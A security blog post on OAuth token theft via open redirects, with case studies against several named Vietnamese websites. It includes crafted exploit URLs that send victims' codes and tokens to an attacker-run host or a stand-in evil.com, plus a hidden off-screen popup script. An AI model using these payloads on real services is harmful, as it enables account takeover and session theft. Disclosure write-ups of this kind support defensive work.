OAuth token theft using open redirect

gentleman meme open redirect

OAuth is an authorization framework, commonly used as a single sign-on solution or convenient "login via Facebook account" button. Despite its "simplicity" and good documentation, you can still config your system wrong. 

A small mistake in the redirect_uri filter configuration will break OAuth2's secure flow. If yourwebsite.com allow redirect_uri to point to hackerwebsite.com, hackers can craft an URL, trick innocent, authorized people visit it, then stole their session (codes/tokens). A common way to bypass redirect_uri filters is messing around open redirect flaw

Let's see how hackers can exploit this misconfiguration to exploit some popular VN websites.

Case studies

Everything containing peaceful word in it is actual exploit code. Visit them only if you know what you are doing.

Zalo OA

Let's consider Zalo Official Account. After logging in, I used Burp Suite to intercept its authorization process. Basically, it works as follow:

  • Request http://oauth.zaloapp.com/v3/auth?app_id=[1]&redirect_uri=[2]?callback=[3]
  • Check cookies then append uid and code parameters to the URL
  • Authorize user with [2]?callback=[3]&uid=[your-uid]&code=[your-auth-code]
  • Redirect to [3] (Open redirect)

So, by pointing [3] to the attacker's site and appending %23 (#), the flow becomes:

  • Request http://oauth.zaloapp.com/v3/auth?app_id=[1]&redirect_uri=[2]?callback=http://evil.com%23
  • Check cookies then append uid and code parameters to the URL
  • Authorize user with [2]?callback=http://evil.com/#&uid=[your-uid]&code=[your-auth-code]
  • Then redirect to evil.com/#&uid=[your-uid]&code=[your-auth-code](everything after # became an URL fragment)
  • The attacker can "log in" with stolen [your-uid] and [your-auth-code] .

Reported: 04/08/2017

Lazada

Lazada allows users to log in using their Facebook accounts. Using a very professional, complex method commonly known as Googling, I found an open redirect flaw.

"lazada.vn" "redirect"

Easy enough: http://ho.lazada.vn/SHOYax?redirect=[target]. In this case, it is:

http://ho.lazada.vn/SHOYax?redirect=http://peaceful-basin-79118.herokuapp.com/LazadaPoC.html

Note that, instead of the traditional flow, Lazada uses slightly modified variation, HTML5 postMessage flow, with an outdated Facebook SDK: after a user authorizes Lazada with Facebook, the fbsr_[app_id] cookie will be set to his/her signed_request. Still, this does not prevent hackers from using traditional flow to create the payload:

https://www.facebook.com/v2.6/dialog/oauth?app_id=1503824746501801
&client_id=1503824746501801&display=popup&
&redirect_uri=http%3A%2F%2Fho.lazada.vn%2FSHOYax%3Fredirect%3Dhttp%3A%2F%2Fpeaceful-basin-79118.herokuapp.com%2FLazadaPoC.html%2F
&response_type=token%2Csigned_request
&scope=public_profile%2Cemail%2Cuser_birthday%2Cuser_friends&sdk=joey&version=v2.6

Reported: 04/08/2017

Viet ID

Look like the redirect_uri is not filtered at all. 

https://oauth.vietid.net/comment/login/enterPassword?cb=https%3A%2F%2Foauth.vietid.net%2Fcomment%2Fauthorize%3Fclient_id%3Dd9c694bd04eb35d96f1d71a84141d075%26response_type%3Dcode%26redirect_uri%3Dhttps%253A%252F%252Fpeaceful-basin-79118.herokuapp.com%252FGenericPoC.html%253Fapp_key%253Dd9c694bd04eb35d96f1d71a84141d075%2526clearsession%253D1%26state%3D281d2b8a029e5e351d1413178b1bc92a%26state_uri%3D

5giay and alike

OK, I somewhat cheated, it's not really open redirect. The following URL will ask for confirmation and auto redirect after 5 seconds to target if the user doesn't press any button.

www.5giay.vn/redirect.php?[target]

Using a small popup at the corner of the screen may be a good idea:

window.open('https://www.facebook.com/v2.4/dialog/oauth?client_id=525129800895046&scope=public_profile,' +
'email&state=[attacker_state]&redirect_uri=https%3A%2F%2Fwww.5giay.vn%2Fredirect.php' +
'%3Fhttp%253A%252F%252Fpeaceful-basin-79118.herokuapp.com%252FXenForo5giay.html%2523',
'_blank', 'toolbar=no,status=no,menubar=no,scrollbars=no,resizable=no,left=10000, top=10000, width=1, height=1, visible=none', '');

The state parameter just makes writing auto exploit just a little bit harder.

More interestingly, after dorking around, I found a lot of forums like 5giay.vn out there seem vulnerable to this kind of 'attack' as well.

Phimmoi (Failed attempt)

Similar to the Lazada case (victim might need to have his/her adblocker disabled):

http://uniad.phimmoi.net/publisher/go/?href=[target]

Although Facebook accepts this as redirect_uri, the redirection does not include anything after & character (treated as a parameter) and the website just uses the code response type (&code=.....). Not exploitable.

Bonus

There are even more, but I am too busy recently (*cough* paying for college *cough* *cough*) to test them all. These websites might make it into the list (hey, I have not tested them, so don't quote me):

  • http://vtcmobile.vn/oauth (80% sure; quite ironic)
  • https://go.vn/oauth
  • https://vegaid.vn

This article is for educational purpose and customers' safety only

Comments